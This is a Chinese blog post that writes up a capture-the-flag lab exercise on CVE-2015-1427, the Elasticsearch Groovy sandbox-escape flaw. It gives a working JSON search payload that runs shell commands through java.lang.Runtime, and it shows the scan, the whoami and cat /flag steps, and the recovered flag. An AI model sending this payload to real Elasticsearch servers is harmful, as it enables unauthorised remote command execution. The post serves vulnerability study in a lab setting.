春秋云境:CVE-2015-1427[漏洞复现]

已于 2024-08-11 20:19:48 修改
阅读量292 收藏
点赞数 3
文章标签: 网络安全
于 2024-08-11 13:41:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43007452/article/details/141104641
版权

查询CNNVD有关漏洞信息

从下方POC、EXP有关漏洞链接以及Github查询可得Payload:

Payload:(上方双斜杠需要换成单斜杠)

{"size":1, "script_fields": {"myscript":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\"whoami\").getText()"}}}

使用Nuclei对靶标进行漏洞扫描

可以看到爆洞URL是:

http://eci-2zeascpohsk7ptpq8lbh.cloudeci1.ichunqiu.com:9200/_search

使用Yakit构造Payload数据包

执行whoami命令,可以看到响应体末尾已经出现回显

执行cat /flag命令,可以看到回显是Base64格式

使用Yakit自带的Codec功能进行解码

flag{57c94e04-f951-4f05-b04a-dea8bf8afbe1}

0DayHP
关注
CVE-2024-0195:SpiderFlow爬虫平台代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
02-02 355
在SpiderFlow爬虫平台项目中 spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入
ED01-CMS 代码问题漏洞CVE-2022-28525)
千寻的博客
11-27 1143
ED01-CMS v20180505 存在任意文件上传漏洞
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)
limb0的博客
11-22 545
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427) 一、漏洞介绍 由于 Groovy 脚本引擎中的不明缺陷,远程 Web 服务器上托管的 Elasticsearch 应用程序受到远程代码执行漏洞的影响。未经认证的远程攻击者使用特别构建的请求可从沙盒逃逸并执行任意 Java 代码。攻击成功可允许用户获取远程 shell 或操纵远程系统上的文件。 二、漏洞危害 ...
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 CVE-2015-1427 漏洞复现
ADummy的博客
02-24 873
ElasticSearch 命令执行漏洞CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 ​ jre版本:openjdk:8-jre ​ elasticsearc
CVE-2015-1427
weixin_34390105的博客
01-13 550
2019独角兽企业重金招聘Python工程师标准>>> ...
ElasticSearch Groovy远程代码执行漏洞(CVE-2015-1427)POC
asdfghjkl978564的博客
04-17 458
ElasticSearch是一个JAVA开发的搜索分析引擎. 2014年爆出的(CVE-2014-3120),由于搜索引擎支持使用脚本代码(MVEL)作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意Java代码,后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 这次轮到的Groovy,影响版本是...
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1127
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
CVE-2012-1823漏洞复现
qq_46804551的博客
05-27 591
前言 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。 复现 在相应的漏洞
漏洞复现-CVE-2010-2883
滕财然的博客
02-26 1519
CVE-2010-2883 Adobe Reader复现 1、漏洞原理 Adobe Reader 8.24-9.3.4的CoolType.dll库在解析字体文件SING表格中的uniqueName项时存在栈溢出漏洞,用户打开了特制的PDF文件可能导致执行恶意代码,可实现比如进行远程控制等。 2、漏洞分析 反汇编工具IDA: IDA 是全球最智能、功能最完善的交互式反汇编程序,许多软件安全专家和黑客...
春秋云境CVE-2022-29464
07-28
- *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
CVE-2015-1805漏洞验证
05-17
用于验证CVE-2015-1805漏洞,该漏洞攻击将导致部分手机出现崩溃重启和提权
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3227
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
buuctf [ElasticSearch]CVE-2015-1427
qq_1873822的博客
03-24 569
漏洞描述 ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个 远程代码执行漏洞CVE-2014-3120) ,漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 Groovy语言“沙盒” ElasticSearch支持使用“在沙盒中的”Groovy语言
[春秋云镜]CVE-2015-1427
niubi707的博客
11-30 5527
春秋云镜CVE-2015-1427 ElasticSearch RCE
CVE-2015-1427(Groovy 沙盒绕过 && 代码执行漏洞
浅笑996的博客
11-22 1954
1、vulhub环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 2、启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-1427/ sudo docker-compose up 3、访问目标的9200,会出现Elasticsearch的信息: 新版本中Elastic...
春秋云镜 CVE-2015-1427
最新发布
qq_22002773的博客
09-14 235
春秋云镜 CVE-2015-1427
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0DayHP

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值